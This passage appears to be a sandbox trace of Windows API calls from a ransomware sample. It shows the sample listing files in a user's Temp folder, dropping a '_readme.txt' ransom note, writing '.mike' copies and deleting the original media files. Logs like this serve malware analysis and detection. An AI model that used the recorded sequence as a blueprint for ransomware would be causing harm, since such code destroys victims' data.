"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yjkc0sx0lp.pps")) returned 1 [0147.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.643] GetFileType (hFile=0x1d4) returned 0x1 [0147.643] GetFileType (hFile=0x1d4) returned 0x1 [0147.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zM n17WWd-87B.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zm n17wwd-87b.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.645] GetFileType (hFile=0x1d4) returned 0x1 [0147.645] GetFileType (hFile=0x1d4) returned 0x1 [0147.645] CloseHandle (hObject=0x1d4) returned 1 [0147.646] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zM n17WWd-87B.wav.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zm n17wwd-87b.wav.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.648] GetFileType (hFile=0x1d4) returned 0x1 [0147.656] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zM n17WWd-87B.wav", dwFileAttributes=0x80) returned 1 [0147.657] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zM n17WWd-87B.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zm n17wwd-87b.wav")) returned 1 [0147.660] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.667] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zrbcFCpDu3i.jpg", dwFileAttributes=0x80) returned 1 [0147.667] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zrbcFCpDu3i.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zrbcfcpdu3i.jpg")) returned 1 [0147.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.681] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zTmQgeO.avi", dwFileAttributes=0x80) returned 1 [0147.681] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\zTmQgeO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ztmqgeo.avi")) returned 1 [0147.686] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x214c2e40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x214e8fa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.686] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2003b080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2003b080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x20087340, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x172d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0R9qLU2Wpa.wav.mike", cAlternateFileName="0R9QLU~1.MIK")) returned 1 [0147.686] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200ad4a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200ad4a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x200ad4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6780, dwReserved0=0x0, dwReserved1=0x0, cFileName="5vj8K5tO.swf.mike", cAlternateFileName="5VJ8K5~1.MIK")) returned 1 [0147.686] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x433160c0, ftCreationTime.dwHighDateTime=0x1d4cb87, ftLastAccessTime.dwLowDateTime=0x4c818550, ftLastAccessTime.dwHighDateTime=0x1d4d0e2, ftLastWriteTime.dwLowDateTime=0x4c818550, ftLastWriteTime.dwHighDateTime=0x1d4d0e2, nFileSizeHigh=0x0, nFileSizeLow=0xfcac, dwReserved0=0x0, dwReserved1=0x0, cFileName="8LHQLxa5GYmKMLFZJxu.gif", cAlternateFileName="8LHQLX~1.GIF")) returned 1 [0147.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200d3600, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200d3600, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x200d3600, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x53f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8pc-KMxnIuh.mp3.mike", cAlternateFileName="8PC-KM~1.MIK")) returned 1 [0147.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x200f9760, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x200f9760, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2011f8c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xff60, dwReserved0=0x0, dwReserved1=0x0, cFileName="a3Hc.mp3.mike", cAlternateFileName="A3HCMP~1.MIK")) returned 1 [0147.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8426eba0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x8426eba0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x842e0fc0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x2fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeARM.log", cAlternateFileName="")) returned 1 [0147.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe6456270, ftCreationTime.dwHighDateTime=0x1d4cae7, ftLastAccessTime.dwLowDateTime=0xbd85bb90, ftLastAccessTime.dwHighDateTime=0x1d4cb74, ftLastWriteTime.dwLowDateTime=0xbd85bb90, ftLastWriteTime.dwHighDateTime=0x1d4cb74, nFileSizeHigh=0x0, nFileSizeLow=0x14044, dwReserved0=0x0, dwReserved1=0x0, cFileName="b3aiZzN.m4a", cAlternateFileName="")) returned 1 [0147.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97d7f40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97d7f40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97d7f40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0147.687] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20145a20, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x20145a20, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x20145a20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x2a30, dwReserved0=0x0, dwReserved1=0x0, cFileName="edJWDvM7 Z3z2t.mp3.mike", cAlternateFileName="EDJWDV~1.MIK")) returned 1 [0147.688] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a91850, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0xa5a1eb90, ftLastAccessTime.dwHighDateTime=0x1d4cc71, ftLastWriteTime.dwLowDateTime=0xa5a1eb90, ftLastWriteTime.dwHighDateTime=0x1d4cc71, nFileSizeHigh=0x0, nFileSizeLow=0x7414, dwReserved0=0x0, dwReserved1=0x0, cFileName="eRJpK.mkv", cAlternateFileName="")) returned 1 [0147.688] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20145a20, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x20145a20, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2016bb80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x7450, dwReserved0=0x0, dwReserved1=0x0, cFileName="fgEYPIHM1Dml4.wav.mike", cAlternateFileName="FGEYPI~1.MIK")) returned 1 [0147.688] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x33d9ad10, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x33d9ad10, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0147.688] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd97fe0a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd97fe0a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd97fe0a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0147.688] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21000240, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21000240, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x210263a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x2280, dwReserved0=0x0, dwReserved1=0x0, cFileName="MksLa0m41b7UvH.mp3.mike", cAlternateFileName="MKSLA0~1.MIK")) returned 1 [0147.688] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2104c500, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2104c500, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x210987c0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x151a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mXervh37EMC5.wav.mike", cAlternateFileName="MXERVH~1.MIK")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97a93e30, ftCreationTime.dwHighDateTime=0x1d4c771, ftLastAccessTime.dwLowDateTime=0x36e35f00, ftLastAccessTime.dwHighDateTime=0x1d4ceff, ftLastWriteTime.dwLowDateTime=0x36e35f00, ftLastWriteTime.dwHighDateTime=0x1d4ceff, nFileSizeHigh=0x0, nFileSizeLow=0xdb85, dwReserved0=0x0, dwReserved1=0x0, cFileName="NfDfawEIcHIAocL0w.bmp", cAlternateFileName="NFDFAW~1.BMP")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x210be920, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x210be920, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x210e4a80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x10d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="O xM8JO.odp.mike", cAlternateFileName="OXM8JO~1.MIK")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2110abe0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2110abe0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21130d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x4fc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="op7stxQJ0.jpg.mike", cAlternateFileName="OP7STX~1.MIK")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21156ea0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21156ea0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x211a3160, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xc8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-ori- rChlL7Nv.avi.mike", cAlternateFileName="P-ORI-~1.MIK")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb14a2010, ftCreationTime.dwHighDateTime=0x1d4d370, ftLastAccessTime.dwLowDateTime=0x6b07d760, ftLastAccessTime.dwHighDateTime=0x1d4cd2f, ftLastWriteTime.dwLowDateTime=0x6b07d760, ftLastWriteTime.dwHighDateTime=0x1d4cd2f, nFileSizeHigh=0x0, nFileSizeLow=0x951c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pl66.mkv", cAlternateFileName="")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x98564dc0, ftCreationTime.dwHighDateTime=0x1d4cfda, ftLastAccessTime.dwLowDateTime=0xe1e6e540, ftLastAccessTime.dwHighDateTime=0x1d4c971, ftLastWriteTime.dwLowDateTime=0xe1e6e540, ftLastWriteTime.dwHighDateTime=0x1d4c971, nFileSizeHigh=0x0, nFileSizeLow=0xeb5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RNWCEa_Rm_b.gif", cAlternateFileName="RNWCEA~1.GIF")) returned 1 [0147.689] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfa850260, ftCreationTime.dwHighDateTime=0x1d4d229, ftLastAccessTime.dwLowDateTime=0x1149a3b0, ftLastAccessTime.dwHighDateTime=0x1d4c84e, ftLastWriteTime.dwLowDateTime=0x1149a3b0, ftLastWriteTime.dwHighDateTime=0x1d4c84e, nFileSizeHigh=0x0, nFileSizeLow=0xfeff, dwReserved0=0x0, dwReserved1=0x0, cFileName="rpHRY1G5j_Sal_qK.mkv", cAlternateFileName="RPHRY1~1.MKV")) returned 1 [0147.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x211c92c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x211c92c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21215580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x7420, dwReserved0=0x0, dwReserved1=0x0, cFileName="rRTdcSTxrS9Cpq.flv.mike", cAlternateFileName="RRTDCS~1.MIK")) returned 1 [0147.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2123b6e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2123b6e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x212adb00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x18c20, dwReserved0=0x0, dwReserved1=0x0, cFileName="T4pA14oYz.xls.mike", cAlternateFileName="T4PA14~1.MIK")) returned 1 [0147.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd978bc80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd978bc80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd978bc80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0147.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40226f10, ftCreationTime.dwHighDateTime=0x1d4cbb3, ftLastAccessTime.dwLowDateTime=0xcc9fd100, ftLastAccessTime.dwHighDateTime=0x1d4cfd0, ftLastWriteTime.dwLowDateTime=0xcc9fd100, ftLastWriteTime.dwHighDateTime=0x1d4cfd0, nFileSizeHigh=0x0, nFileSizeLow=0x18368, dwReserved0=0x0, dwReserved1=0x0, cFileName="tGVrLRIfo.m4a", cAlternateFileName="TGVRLR~1.M4A")) returned 1 [0147.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x212d3c60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x212d3c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2131ff20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x17c70, dwReserved0=0x0, dwReserved1=0x0, cFileName="THzMIQT0Q-S9l18rwl.pps.mike", cAlternateFileName="THZMIQ~1.MIK")) returned 1 [0147.690] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21346080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21346080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21392340, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xcd90, dwReserved0=0x0, dwReserved1=0x0, cFileName="TJio.flv.mike", cAlternateFileName="TJIOFL~1.MIK")) returned 1 [0147.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x213b84a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x213b84a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21404760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb480, dwReserved0=0x0, dwReserved1=0x0, cFileName="UmotUfgG9RWo_.flv.mike", cAlternateFileName="UMOTUF~1.MIK")) returned 1 [0147.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2142a8c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2142a8c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21450a20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xec50, dwReserved0=0x0, dwReserved1=0x0, cFileName="WFlPoVHCvo.mp4.mike", cAlternateFileName="WFLPOV~1.MIK")) returned 1 [0147.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x874c95a0, ftCreationTime.dwHighDateTime=0x1d4d5ae, ftLastAccessTime.dwLowDateTime=0x874c95a0, ftLastAccessTime.dwHighDateTime=0x1d4d5ae, ftLastWriteTime.dwLowDateTime=0x874c95a0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0147.691] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21450a20, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21450a20, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21476b80, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x2420, dwReserved0=0x0, dwReserved1=0x0, cFileName="YJKC0SX0lp.pps.mike", cAlternateFileName="YJKC0S~1.MIK")) returned 1 [0147.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2149cce0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2149cce0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2149cce0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xefb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zM n17WWd-87B.wav.mike", cAlternateFileName="ZMN17W~1.MIK")) returned 1 [0147.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x214c2e40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x214c2e40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x214c2e40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xa030, dwReserved0=0x0, dwReserved1=0x0, cFileName="zrbcFCpDu3i.jpg.mike", cAlternateFileName="ZRBCFC~1.MIK")) returned 1 [0147.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x214c2e40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x214c2e40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x214e8fa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="zTmQgeO.avi.mike", cAlternateFileName="ZTMQGE~1.MIK")) returned 1 [0147.692] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20087340, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x20087340, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x214e8fa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0147.694] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20087340, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x20087340, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x214e8fa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0147.694] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0147.694] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.694] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.694] CoTaskMemFree (pv=0x4e1c10) [0147.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.697] FindNextFileW (in: 